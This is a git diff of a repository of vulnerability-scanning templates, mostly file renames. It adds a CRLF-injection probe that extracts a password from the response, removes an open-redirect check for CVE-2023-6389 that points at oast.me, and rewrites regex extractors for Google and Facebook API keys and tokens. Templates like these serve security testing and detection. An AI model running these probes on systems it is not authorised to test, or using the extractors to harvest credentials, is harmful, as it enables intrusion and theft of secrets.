./poc/xss/moodle-auth-xss.yaml ./poc/xss/moodle-filter-jmol-xss-8942.yaml @@ -53602,7 +53631,7 @@ ./poc/xss/oracle-ebs-xss-9375.yaml ./poc/xss/oracle-ebs-xss-9376.yaml ./poc/xss/oracle-ebs-xss.yaml -./poc/xss/oracle-oam-xss(1).yaml +./poc/xss/oracle-oam-xss.yaml ./poc/xss/oracle-siebel-xss-9400.yaml ./poc/xss/oracle-siebel-xss-9401.yaml ./poc/xss/oracle-siebel-xss-9402.yaml @@ -53689,10 +53718,10 @@ ./poc/xss/top-xss-params-10808.yaml ./poc/xss/top-xss-params-10809.yaml ./poc/xss/top-xss-params.yaml -./poc/xss/turbocrm-xss-10848.yaml ./poc/xss/turbocrm-xss-10849.yaml ./poc/xss/turbocrm-xss-10850.yaml ./poc/xss/turbocrm-xss-10851.yaml +./poc/xss/turbocrm-xss.yaml ./poc/xss/ueditor-xss.yaml ./poc/xss/uncode_xss.yaml ./poc/xss/universal-media-xss.yaml @@ -53708,9 +53737,9 @@ ./poc/xss/wems-manager-xss-11193.yaml ./poc/xss/wems-manager-xss-11194.yaml ./poc/xss/wems-manager-xss.yaml -./poc/xss/window-name-domxss-11212.yaml ./poc/xss/window-name-domxss-11213.yaml ./poc/xss/window-name-domxss-11214.yaml +./poc/xss/window-name-domxss.yaml ./poc/xss/woocommerce-pdf-invoices-xss.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -53752,7 +53781,7 @@ ./poc/xss/wp-custom-tables-xss-11432.yaml ./poc/xss/wp-custom-tables-xss-11433.yaml ./poc/xss/wp-custom-tables-xss-11434.yaml -./poc/xss/wp-custom-tables-xss.yaml +./poc/xss/wp-custom-tables-xss-11435.yaml ./poc/xss/wp-finder-xss-11445.yaml ./poc/xss/wp-finder-xss-11446.yaml ./poc/xss/wp-finder-xss-11447.yaml diff --git a/poc/adobe/adobe-connect-version.yaml b/poc/adobe/adobe-connect-version-102.yaml similarity index 100% rename from poc/adobe/adobe-connect-version.yaml rename to poc/adobe/adobe-connect-version-102.yaml diff --git a/poc/adobe/adobe-experience-manager-login-106.yaml b/poc/adobe/adobe-experience-manager-login.yaml similarity index 100% rename from poc/adobe/adobe-experience-manager-login-106.yaml rename to poc/adobe/adobe-experience-manager-login.yaml diff --git a/poc/adobe/aem-default-get-servlet-138.yaml b/poc/adobe/aem-default-get-servlet.yaml similarity index 100% rename from poc/adobe/aem-default-get-servlet-138.yaml rename to poc/adobe/aem-default-get-servlet.yaml diff --git a/poc/adobe/aem-detection-146.yaml b/poc/adobe/aem-detection.yaml similarity index 100% rename from poc/adobe/aem-detection-146.yaml rename to poc/adobe/aem-detection.yaml diff --git a/poc/adobe/aem-jcr-querybuilder.yaml b/poc/adobe/aem-jcr-querybuilder-162.yaml similarity index 100% rename from poc/adobe/aem-jcr-querybuilder.yaml rename to poc/adobe/aem-jcr-querybuilder-162.yaml diff --git a/poc/adobe/aem-login-status-171.yaml b/poc/adobe/aem-login-status.yaml similarity index 100% rename from poc/adobe/aem-login-status-171.yaml rename to poc/adobe/aem-login-status.yaml diff --git a/poc/adobe/aem-querybuilder-json-servlet.yaml b/poc/adobe/aem-querybuilder-json-servlet-186.yaml similarity index 100% rename from poc/adobe/aem-querybuilder-json-servlet.yaml rename to poc/adobe/aem-querybuilder-json-servlet-186.yaml diff --git a/poc/airflow/airflow-panel.yaml b/poc/airflow/airflow-panel-242.yaml similarity index 100% rename from poc/airflow/airflow-panel.yaml rename to poc/airflow/airflow-panel-242.yaml diff --git a/poc/airflow/Airflow-unauthorized.yaml b/poc/airflow/airflow-unauthorized.yaml similarity index 100% rename from poc/airflow/Airflow-unauthorized.yaml rename to poc/airflow/airflow-unauthorized.yaml diff --git a/poc/apache/apache-apisix-panel-337.yaml b/poc/apache/apache-apisix-panel.yaml similarity index 100% rename from poc/apache/apache-apisix-panel-337.yaml rename to poc/apache/apache-apisix-panel.yaml diff --git a/poc/apache/apache-dubbo-detect-351.yaml b/poc/apache/apache-dubbo-detect.yaml similarity index 100% rename from poc/apache/apache-dubbo-detect-351.yaml rename to poc/apache/apache-dubbo-detect.yaml diff --git a/poc/apache/apache-guacamole-361.yaml b/poc/apache/apache-guacamole.yaml similarity index 100% rename from poc/apache/apache-guacamole-361.yaml rename to poc/apache/apache-guacamole.yaml diff --git a/poc/apache/apache-solr-log4j-cve-2021-44228.yaml b/poc/apache/apache-solr-log4j-CVE-2021-44228.yaml similarity index 100% rename from poc/apache/apache-solr-log4j-cve-2021-44228.yaml rename to poc/apache/apache-solr-log4j-CVE-2021-44228.yaml diff --git a/poc/apache/default-apache-test-all-6813.yaml b/poc/apache/default-apache-test-all.yaml similarity index 100% rename from poc/apache/default-apache-test-all-6813.yaml rename to poc/apache/default-apache-test-all.yaml diff --git a/poc/apache/default-apache2-ubuntu-page.yaml b/poc/apache/default-apache2-ubuntu-page-6808.yaml similarity index 100% rename from poc/apache/default-apache2-ubuntu-page.yaml rename to poc/apache/default-apache2-ubuntu-page-6808.yaml diff --git a/poc/api/apache-apisix-panel-337.yaml b/poc/api/apache-apisix-panel.yaml similarity index 100% rename from poc/api/apache-apisix-panel-337.yaml rename to poc/api/apache-apisix-panel.yaml diff --git a/poc/api/api-alienvault.yaml b/poc/api/api-alienvault-390.yaml similarity index 100% rename from poc/api/api-alienvault.yaml rename to poc/api/api-alienvault-390.yaml diff --git a/poc/api/api-fastly-423.yaml b/poc/api/api-fastly.yml similarity index 100% rename from poc/api/api-fastly-423.yaml rename to poc/api/api-fastly.yml diff --git a/poc/api/api-gitlab-430.yaml b/poc/api/api-gitlab.yml similarity index 100% rename from poc/api/api-gitlab-430.yaml rename to poc/api/api-gitlab.yml diff --git a/poc/api/apiman-panel-464.yaml b/poc/api/apiman-panel.yaml similarity index 100% rename from poc/api/apiman-panel-464.yaml rename to poc/api/apiman-panel.yaml diff --git a/poc/api/couchbase-buckets-api-1233.yaml b/poc/api/couchbase-buckets-api.yaml similarity index 100% rename from poc/api/couchbase-buckets-api-1233.yaml rename to poc/api/couchbase-buckets-api.yaml diff --git a/poc/api/exposed-docker-api-7300.yaml b/poc/api/exposed-docker-api.yaml similarity index 100% rename from poc/api/exposed-docker-api-7300.yaml rename to poc/api/exposed-docker-api.yaml diff --git a/poc/api/mailchimp-api(1).yaml b/poc/api/mailchimp-api.yaml similarity index 100% rename from poc/api/mailchimp-api(1).yaml rename to poc/api/mailchimp-api.yaml diff --git a/poc/api/stripe-api-key.yaml b/poc/api/stripe-api-key(1).yaml similarity index 100% rename from poc/api/stripe-api-key.yaml rename to poc/api/stripe-api-key(1).yaml diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect.yaml similarity index 100% rename from poc/atlassian/confluence-detect-1189.yaml rename to poc/atlassian/confluence-detect.yaml diff --git a/poc/atlassian/jira_user_piker.yaml b/poc/atlassian/jira_user_piker (copy 1).yaml similarity index 100% rename from poc/atlassian/jira_user_piker.yaml rename to poc/atlassian/jira_user_piker (copy 1).yaml diff --git a/poc/auth/gogs-unauth.yaml b/poc/auth/Gogs-unauth.yaml similarity index 100% rename from poc/auth/gogs-unauth.yaml rename to poc/auth/Gogs-unauth.yaml diff --git a/poc/auth/h3c-secpath-loginbypass.yaml b/poc/auth/H3C-SECPATH-loginBypass.yaml similarity index 100% rename from poc/auth/h3c-secpath-loginbypass.yaml rename to poc/auth/H3C-SECPATH-loginBypass.yaml diff --git a/poc/auth/kingsoft-default-login.yaml b/poc/auth/Kingsoft-default-login.yaml similarity index 100% rename from poc/auth/kingsoft-default-login.yaml rename to poc/auth/Kingsoft-default-login.yaml diff --git a/poc/auth/adobe-experience-manager-login-106.yaml b/poc/auth/adobe-experience-manager-login.yaml similarity index 100% rename from poc/auth/adobe-experience-manager-login-106.yaml rename to poc/auth/adobe-experience-manager-login.yaml diff --git a/poc/auth/aem-login-status-171.yaml b/poc/auth/aem-login-status.yaml similarity index 100% rename from poc/auth/aem-login-status-171.yaml rename to poc/auth/aem-login-status.yaml diff --git a/poc/auth/aims-password-mgmt-client-219.yaml b/poc/auth/aims-password-mgmt-client.yaml similarity index 100% rename from poc/auth/aims-password-mgmt-client-219.yaml rename to poc/auth/aims-password-mgmt-client.yaml diff --git a/poc/auth/aims-password-portal-225.yaml b/poc/auth/aims-password-portal.yaml similarity index 100% rename from poc/auth/aims-password-portal-225.yaml rename to poc/auth/aims-password-portal.yaml diff --git a/poc/auth/Airflow-unauthorized.yaml b/poc/auth/airflow-unauthorized.yaml similarity index 100% rename from poc/auth/Airflow-unauthorized.yaml rename to poc/auth/airflow-unauthorized.yaml diff --git a/poc/auth/alibaba-mongoshake-unauth.yaml b/poc/auth/alibaba-mongoshake-unauth-270.yaml similarity index 100% rename from poc/auth/alibaba-mongoshake-unauth.yaml rename to poc/auth/alibaba-mongoshake-unauth-270.yaml diff --git a/poc/auth/argocd-login.yaml b/poc/auth/argocd-login-536.yaml similarity index 100% rename from poc/auth/argocd-login.yaml rename to poc/auth/argocd-login-536.yaml diff --git a/poc/auth/braintree-access-token.yaml b/poc/auth/braintree-access-token-773.yaml old mode 100755 new mode 100644 similarity index 100% rename from poc/auth/braintree-access-token.yaml rename to poc/auth/braintree-access-token-773.yaml diff --git a/poc/auth/camunda-login-panel-845.yaml b/poc/auth/camunda-login-panel.yaml similarity index 100% rename from poc/auth/camunda-login-panel-845.yaml rename to poc/auth/camunda-login-panel.yaml diff --git a/poc/auth/cas-login.yaml b/poc/auth/cas-login-870.yaml similarity index 100% rename from poc/auth/cas-login.yaml rename to poc/auth/cas-login-870.yaml diff --git a/poc/auth/cisco-systems-login-973.yaml b/poc/auth/cisco-systems-login.yaml similarity index 100% rename from poc/auth/cisco-systems-login-973.yaml rename to poc/auth/cisco-systems-login.yaml diff --git a/poc/auth/coldfusion-administrator-login-1147.yaml b/poc/auth/coldfusion-administrator-login.yaml similarity index 100% rename from poc/auth/coldfusion-administrator-login-1147.yaml rename to poc/auth/coldfusion-administrator-login.yaml diff --git a/poc/auth/dell-idrac9-default-login-6934.yaml b/poc/auth/dell-idrac9-default-login.yaml similarity index 100% rename from poc/auth/dell-idrac9-default-login-6934.yaml rename to poc/auth/dell-idrac9-default-login.yaml diff --git a/poc/auth/dell-openmanager-login-6948.yaml b/poc/auth/dell-openmanager-login-6951.yaml similarity index 100% rename from poc/auth/dell-openmanager-login-6948.yaml rename to poc/auth/dell-openmanager-login-6951.yaml diff --git a/poc/auth/facebook-secret.yaml b/poc/auth/facebook-secret-7386.yaml similarity index 100% rename from poc/auth/facebook-secret.yaml rename to poc/auth/facebook-secret-7386.yaml diff --git a/poc/auth/google-secrets.yaml b/poc/auth/facebook-secrets.yaml similarity index 52% rename from poc/auth/google-secrets.yaml rename to poc/auth/facebook-secrets.yaml index d9cb5cef3a..a689838b9d 100644 --- a/poc/auth/google-secrets.yaml +++ b/poc/auth/facebook-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: facebook-access-token + name: google-api-key regex: - - "EAACEdEose0cBA[0-9A-Za-z]+" + - "AIza[0-9A-Za-z\\\\-_]{35}" - type: regex - name: facebook-client-id + name: google-cloud-platform-api-key regex: - - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" + - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" - type: regex - name: facebook-oauth + name: google-oauth regex: - - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" + - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" - type: regex - name: facebook-secret-key + name: google-oauth-access-token regex: - - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" + - "ya29\\\\.[0-9A-Za-z\\\\-_]+" diff --git a/poc/auth/gocd-encryption-key.yaml b/poc/auth/gocd-encryption-key-7749.yaml similarity index 100% rename from poc/auth/gocd-encryption-key.yaml rename to poc/auth/gocd-encryption-key-7749.yaml diff --git a/poc/auth/gophish-default-login-7794.yaml b/poc/auth/gophish-default-login.yaml similarity index 100% rename from poc/auth/gophish-default-login-7794.yaml rename to poc/auth/gophish-default-login.yaml diff --git a/poc/auth/gt-ac2900-login(1).yaml b/poc/auth/gt-ac2900-login.yaml similarity index 100% rename from poc/auth/gt-ac2900-login(1).yaml rename to poc/auth/gt-ac2900-login.yaml diff --git a/poc/auth/JeeSite-default-login.yaml b/poc/auth/jeesite-default-login.yaml similarity index 100% rename from poc/auth/JeeSite-default-login.yaml rename to poc/auth/jeesite-default-login.yaml diff --git a/poc/auth/logins.yaml b/poc/auth/logins (copy 1).yaml similarity index 100% rename from poc/auth/logins.yaml rename to poc/auth/logins (copy 1).yaml diff --git a/poc/auth/mofi4500-default-login.yaml b/poc/auth/mofi4500-default-login-8914.yaml similarity index 100% rename from poc/auth/mofi4500-default-login.yaml rename to poc/auth/mofi4500-default-login-8914.yaml diff --git a/poc/auth/nexus-default-login.yaml b/poc/auth/nexus-default-login-9089.yaml similarity index 100% rename from poc/auth/nexus-default-login.yaml rename to poc/auth/nexus-default-login-9089.yaml diff --git a/poc/auth/paypal-braintree-token(1).yaml b/poc/auth/paypal-braintree-token.yaml similarity index 100% rename from poc/auth/paypal-braintree-token(1).yaml rename to poc/auth/paypal-braintree-token.yaml diff --git a/poc/auth/rancher-default-login.yaml b/poc/auth/rancher-default-login-9816.yaml similarity index 100% rename from poc/auth/rancher-default-login.yaml rename to poc/auth/rancher-default-login-9816.yaml diff --git a/poc/auth/rockmongo-default-login.yaml b/poc/auth/rockmongo-default-login-9900.yaml similarity index 100% rename from poc/auth/rockmongo-default-login.yaml rename to poc/auth/rockmongo-default-login-9900.yaml diff --git a/poc/auth/shopify-shared-secret-11862.yaml b/poc/auth/shopify-shared-secret(1).yaml similarity index 100% rename from poc/auth/shopify-shared-secret-11862.yaml rename to poc/auth/shopify-shared-secret(1).yaml diff --git a/poc/auth/shopify-token-11863.yaml b/poc/auth/shopify-token(1).yaml similarity index 100% rename from poc/auth/shopify-token-11863.yaml rename to poc/auth/shopify-token(1).yaml diff --git a/poc/auth/sitefinity-login.yaml b/poc/auth/sitefinity-login-10299.yaml similarity index 100% rename from poc/auth/sitefinity-login.yaml rename to poc/auth/sitefinity-login-10299.yaml diff --git a/poc/auth/smartsense-default-login.yaml b/poc/auth/smartsense-default-login-10331.yaml similarity index 100% rename from poc/auth/smartsense-default-login.yaml rename to poc/auth/smartsense-default-login-10331.yaml diff --git a/poc/auth/solarwinds-default-login.yaml b/poc/auth/solarwinds-default-login-10356.yaml similarity index 100% rename from poc/auth/solarwinds-default-login.yaml rename to poc/auth/solarwinds-default-login-10356.yaml diff --git a/poc/auth/stripe-api-key.yaml b/poc/auth/stripe-api-key(1).yaml similarity index 100% rename from poc/auth/stripe-api-key.yaml rename to poc/auth/stripe-api-key(1).yaml diff --git a/poc/auth/submitty-login.yaml b/poc/auth/submitty-login-10567.yaml similarity index 100% rename from poc/auth/submitty-login.yaml rename to poc/auth/submitty-login-10567.yaml diff --git a/poc/auth/trilithic-viewpoint-login.yaml b/poc/auth/trilithic-viewpoint-login-10840.yaml similarity index 100% rename from poc/auth/trilithic-viewpoint-login.yaml rename to poc/auth/trilithic-viewpoint-login-10840.yaml diff --git a/poc/auth/twitter-secret.yaml b/poc/auth/twitter-secret(1).yaml similarity index 100% rename from poc/auth/twitter-secret.yaml rename to poc/auth/twitter-secret(1).yaml diff --git a/poc/auth/unauthenticated-popup-upload.yaml b/poc/auth/unauthenticated-popup-upload-10923.yaml similarity index 100% rename from poc/auth/unauthenticated-popup-upload.yaml rename to poc/auth/unauthenticated-popup-upload-10923.yaml diff --git a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml b/poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml similarity index 100% rename from poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml rename to poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml diff --git a/poc/auth/versa-default-login.yaml b/poc/auth/versa-default-login-11004.yaml similarity index 100% rename from poc/auth/versa-default-login.yaml rename to poc/auth/versa-default-login-11004.yaml diff --git a/poc/auth/wpdm-cache-session-11439.yaml b/poc/auth/wpdm-cache-session.yaml similarity index 100% rename from poc/auth/wpdm-cache-session-11439.yaml rename to poc/auth/wpdm-cache-session.yaml diff --git a/poc/auth/wpmudev-pub-keys.yaml b/poc/auth/wpmudev-pub-keys-11507.yaml similarity index 100% rename from poc/auth/wpmudev-pub-keys.yaml rename to poc/auth/wpmudev-pub-keys-11507.yaml diff --git a/poc/auth/xerox7-default-login-11680.yaml b/poc/auth/xerox7-default-login.yaml similarity index 100% rename from poc/auth/xerox7-default-login-11680.yaml rename to poc/auth/xerox7-default-login.yaml diff --git a/poc/auth/zabbix-default-login-11763.yaml b/poc/auth/zabbix-default-login.yaml similarity index 100% rename from poc/auth/zabbix-default-login-11763.yaml rename to poc/auth/zabbix-default-login.yaml diff --git a/poc/aws/aws-access-id-618.yaml b/poc/aws/aws-access-id-620.yaml similarity index 100% rename from poc/aws/aws-access-id-618.yaml rename to poc/aws/aws-access-id-620.yaml diff --git a/poc/aws/aws-object-listing-646.yaml b/poc/aws/aws-object-listing.yaml similarity index 100% rename from poc/aws/aws-object-listing-646.yaml rename to poc/aws/aws-object-listing.yaml diff --git a/poc/aws/aws-redirect-652.yaml b/poc/aws/aws-redirect.yaml similarity index 100% rename from poc/aws/aws-redirect-652.yaml rename to poc/aws/aws-redirect.yaml diff --git a/poc/aws/awstats-script.yaml b/poc/aws/awstats-script-658.yaml similarity index 100% rename from poc/aws/awstats-script.yaml rename to poc/aws/awstats-script-658.yaml diff --git a/poc/cisco/cisco-ace-device-manager.yaml b/poc/cisco/cisco-ace-device-manager-929.yaml similarity index 100% rename from poc/cisco/cisco-ace-device-manager.yaml rename to poc/cisco/cisco-ace-device-manager-929.yaml diff --git a/poc/cisco/cisco-prime-infrastructure-952.yaml b/poc/cisco/cisco-prime-infrastructure.yaml similarity index 100% rename from poc/cisco/cisco-prime-infrastructure-952.yaml rename to poc/cisco/cisco-prime-infrastructure.yaml diff --git a/poc/cisco/cisco-sd-wan-955.yaml b/poc/cisco/cisco-sd-wan.yaml similarity index 100% rename from poc/cisco/cisco-sd-wan-955.yaml rename to poc/cisco/cisco-sd-wan.yaml diff --git a/poc/cisco/cisco-systems-login-973.yaml b/poc/cisco/cisco-systems-login.yaml similarity index 100% rename from poc/cisco/cisco-systems-login-973.yaml rename to poc/cisco/cisco-systems-login.yaml diff --git a/poc/coldfusion/coldfusion-administrator-login-1147.yaml b/poc/coldfusion/coldfusion-administrator-login.yaml similarity index 100% rename from poc/coldfusion/coldfusion-administrator-login-1147.yaml rename to poc/coldfusion/coldfusion-administrator-login.yaml diff --git a/poc/config/configuration-listing.yaml b/poc/config/configuration-listing-1184.yaml similarity index 100% rename from poc/config/configuration-listing.yaml rename to poc/config/configuration-listing-1184.yaml diff --git a/poc/config/confluence-detect-1189.yaml b/poc/config/confluence-detect.yaml similarity index 100% rename from poc/config/confluence-detect-1189.yaml rename to poc/config/confluence-detect.yaml diff --git a/poc/config/honeywell-scada-config.yaml b/poc/config/honeywell-scada-config-7992.yaml similarity index 100% rename from poc/config/honeywell-scada-config.yaml rename to poc/config/honeywell-scada-config-7992.yaml diff --git a/poc/crlf_injection/CRLF.yaml b/poc/crlf_injection/CRLF.yaml new file mode 100644 index 0000000000..3b23d90069 --- /dev/null +++ b/poc/crlf_injection/CRLF.yaml @@ -0,0 +1,29 @@ +id: CRLF + +info: + name: CRLF + author: Tomitom13 + severity: unknown + tags: clrf,rootme + +requests: + - method: GET + path: + - "{{BaseURL}}index.php?username=admin%20authenticated.%0D%0AMeyo&password=n'importe-quoi" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "password : " + part: body + + extractors: + - type: regex + name: password + part: body + regex: + - "password : [a-zA-Z0-9!@#$%^&*()_+,.<>?]+" diff --git a/poc/cross_site_request_forgery/csrfguard-detect.yaml b/poc/cross_site_request_forgery/csrfguard-detect-1290.yaml similarity index 100% rename from poc/cross_site_request_forgery/csrfguard-detect.yaml rename to poc/cross_site_request_forgery/csrfguard-detect-1290.yaml diff --git a/poc/cve/ CVE-2023-6389.yaml b/poc/cve/ CVE-2023-6389.yaml deleted file mode 100644 index 74d9433cde..0000000000 --- a/poc/cve/ CVE-2023-6389.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2023-6389 - -info: - name: WordPress Toolbar <= 2.2.6 - Open Redirect - author: Kazgangap - severity: medium - description: | - The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. - reference: - - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/ - - https://nvd.nist.gov/vuln/detail/CVE-2023-6389 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2023-6389 - cwe-id: CWE-601 - epss-score: 0.00097 - epss-percentile: 0.40297 - cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:* - metadata: - verified: true - max-request: 1 - vendor: abhinavsingh - product: wordpress_toolbar - publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2010-1871-2.yaml b/poc/cve/CVE-2010-1871.yml similarity index 100% rename from poc/cve/CVE-2010-1871-2.yaml rename to poc/cve/CVE-2010-1871.yml diff --git a/poc/cve/cve-2015-5354.yaml b/poc/cve/CVE-2015-5354.yaml similarity index 100% rename from poc/cve/cve-2015-5354.yaml rename to poc/cve/CVE-2015-5354.yaml diff --git a/poc/cve/cve-2018-10230.yaml b/poc/cve/CVE-2018-10230.yaml similarity index 100% rename from poc/cve/cve-2018-10230.yaml rename to poc/cve/CVE-2018-10230.yaml diff --git a/poc/cve/cve-2018-11231.yaml b/poc/cve/CVE-2018-11231.yaml similarity index 100% rename from poc/cve/cve-2018-11231.yaml rename to poc/cve/CVE-2018-11231.yaml diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/CVE-2018-15535.yaml similarity index 100% rename from poc/cve/cve-2018-15535.yaml rename to poc/cve/CVE-2018-15535.yaml diff --git a/poc/cve/cve-2018-15657.yaml b/poc/cve/CVE-2018-15657.yaml similarity index 100% rename from poc/cve/cve-2018-15657.yaml rename to poc/cve/CVE-2018-15657.yaml diff --git a/poc/cve/cve-2018-18778.yaml b/poc/cve/CVE-2018-18778.yaml similarity index 100% rename from poc/cve/cve-2018-18778.yaml rename to poc/cve/CVE-2018-18778.yaml diff --git a/poc/cve/cve-2018-19749.yaml b/poc/cve/CVE-2018-19749.yaml similarity index 100% rename from poc/cve/cve-2018-19749.yaml rename to poc/cve/CVE-2018-19749.yaml diff --git a/poc/cve/cve-2018-19752.yaml b/poc/cve/CVE-2018-19752.yaml similarity index 100% rename from poc/cve/cve-2018-19752.yaml rename to poc/cve/CVE-2018-19752.yaml diff --git a/poc/cve/cve-2018-19915.yaml b/poc/cve/CVE-2018-19915.yaml similarity index 100% rename from poc/cve/cve-2018-19915.yaml rename to poc/cve/CVE-2018-19915.yaml diff --git a/poc/cve/CVE-2019-11043 (copy 2).yaml b/poc/cve/CVE-2019-11043 (copy 1).yaml similarity index 100% rename from poc/cve/CVE-2019-11043 (copy 2).yaml rename to poc/cve/CVE-2019-11043 (copy 1).yaml diff --git a/poc/cve/cve-2019-11580-3749.yaml b/poc/cve/CVE-2019-11580.yaml similarity index 100% rename from poc/cve/cve-2019-11580-3749.yaml rename to poc/cve/CVE-2019-11580.yaml diff --git a/poc/cve/CVE-2019-13396.yaml b/poc/cve/CVE-2019-13396 (copy 1).yaml similarity index 100% rename from poc/cve/CVE-2019-13396.yaml rename to poc/cve/CVE-2019-13396 (copy 1).yaml diff --git a/poc/cve/cve-2019-18665.yaml b/poc/cve/CVE-2019-18665.yaml similarity index 100% rename from poc/cve/cve-2019-18665.yaml rename to poc/cve/CVE-2019-18665.yaml diff --git a/poc/cve/cve-2019-2729-4115.yaml b/poc/cve/CVE-2019-2729.yaml similarity index 100% rename from poc/cve/cve-2019-2729-4115.yaml rename to poc/cve/CVE-2019-2729.yaml diff --git a/poc/cve/cve-2019-5418-4168.yaml b/poc/cve/CVE-2019-5418-2 copy.yaml similarity index 100% rename from poc/cve/cve-2019-5418-4168.yaml rename to poc/cve/CVE-2019-5418-2 copy.yaml diff --git a/poc/cve/cve-2019-9041-4291.yaml b/poc/cve/CVE-2019-9041.yaml similarity index 100% rename from poc/cve/cve-2019-9041-4291.yaml rename to poc/cve/CVE-2019-9041.yaml diff --git a/poc/cve/cve-2019-9670-4307.yaml b/poc/cve/CVE-2019-9670.yaml similarity index 100% rename from poc/cve/cve-2019-9670-4307.yaml rename to poc/cve/CVE-2019-9670.yaml diff --git a/poc/cve/cve-2019-9922(1).yaml b/poc/cve/CVE-2019-9922.yaml similarity index 100% rename from poc/cve/cve-2019-9922(1).yaml rename to poc/cve/CVE-2019-9922.yaml diff --git a/poc/cve/CVE-2020-10124 (copy 1).yaml b/poc/cve/CVE-2020-10124.yaml similarity index 100% rename from poc/cve/CVE-2020-10124 (copy 1).yaml rename to poc/cve/CVE-2020-10124.yaml diff --git a/poc/cve/CVE-2020-11710 (copy 2).yaml b/poc/cve/CVE-2020-11710 (copy 1).yaml similarity index 100% rename from poc/cve/CVE-2020-11710 (copy 2).yaml rename to poc/cve/CVE-2020-11710 (copy 1).yaml diff --git a/poc/cve/cve-2020-13158.yaml b/poc/cve/CVE-2020-13158.yaml similarity index 100% rename from poc/cve/cve-2020-13158.yaml rename to poc/cve/CVE-2020-13158.yaml diff --git a/poc/cve/cve-2020-13405.yaml b/poc/cve/CVE-2020-13405.yaml similarity index 100% rename from poc/cve/cve-2020-13405.yaml rename to poc/cve/CVE-2020-13405.yaml diff --git a/poc/cve/cve-2020-14883-4586.yaml b/poc/cve/CVE-2020-14883.yaml similarity index 100% rename from poc/cve/cve-2020-14883-4586.yaml rename to poc/cve/CVE-2020-14883.yaml diff --git a/poc/cve/cve-2020-17505-4674.yaml b/poc/cve/CVE-2020-17505.yaml similarity index 100% rename from poc/cve/cve-2020-17505-4674.yaml rename to poc/cve/CVE-2020-17505.yaml diff --git a/poc/cve/cve-2020-1938-4715.yaml b/poc/cve/CVE-2020-1938.yaml similarity index 100% rename from poc/cve/cve-2020-1938-4715.yaml rename to poc/cve/CVE-2020-1938.yaml diff --git a/poc/cve/cve-2020-1943-4718.yaml b/poc/cve/CVE-2020-1943.yaml similarity index 100% rename from poc/cve/cve-2020-1943-4718.yaml rename to poc/cve/CVE-2020-1943.yaml diff --git a/poc/cve/cve-2020-20988(1).yaml b/poc/cve/CVE-2020-20988.yaml similarity index 100% rename from poc/cve/cve-2020-20988(1).yaml rename to poc/cve/CVE-2020-20988.yaml diff --git a/poc/cve/cve-2020-25078-4858.yaml b/poc/cve/CVE-2020-25078.yaml similarity index 100% rename from poc/cve/cve-2020-25078-4858.yaml rename to poc/cve/CVE-2020-25078.yaml diff --git a/poc/cve/cve-2020-25223-4871.yaml b/poc/cve/CVE-2020-25223.yaml similarity index 100% rename from poc/cve/cve-2020-25223-4871.yaml rename to poc/cve/CVE-2020-25223.yaml diff --git a/poc/cve/cve-2020-25495-4876.yaml b/poc/cve/CVE-2020-25495.yaml similarity index 100% rename from poc/cve/cve-2020-25495-4876.yaml rename to poc/cve/CVE-2020-25495.yaml diff --git a/poc/cve/cve-2020-26919-4931.yaml b/poc/cve/CVE-2020-26919.yaml similarity index 100% rename from poc/cve/cve-2020-26919-4931.yaml rename to poc/cve/CVE-2020-26919.yaml diff --git a/poc/cve/cve-2020-28871-4987.yaml b/poc/cve/CVE-2020-28871.yaml similarity index 100% rename from poc/cve/cve-2020-28871-4987.yaml rename to poc/cve/CVE-2020-28871.yaml diff --git a/poc/cve/cve-2020-35848-5104.yaml b/poc/cve/CVE-2020-35848.yaml similarity index 100% rename from poc/cve/cve-2020-35848-5104.yaml rename to poc/cve/CVE-2020-35848.yaml diff --git a/poc/cve/cve-2020-6207-5210.yaml b/poc/cve/CVE-2020-6207.yaml similarity index 100% rename from poc/cve/cve-2020-6207-5210.yaml rename to poc/cve/CVE-2020-6207.yaml diff --git a/poc/cve/cve-2020-7980.yaml b/poc/cve/CVE-2020-7980.yaml similarity index 100% rename from poc/cve/cve-2020-7980.yaml rename to poc/cve/CVE-2020-7980.yaml diff --git a/poc/cve/cve-2020-9036-5359.yaml b/poc/cve/CVE-2020-9036.yaml similarity index 100% rename from poc/cve/cve-2020-9036-5359.yaml rename to poc/cve/CVE-2020-9036.yaml diff --git a/poc/cve/cve-2020-9496-5418.yaml b/poc/cve/CVE-2020-9496.yaml similarity index 100% rename from poc/cve/cve-2020-9496-5418.yaml rename to 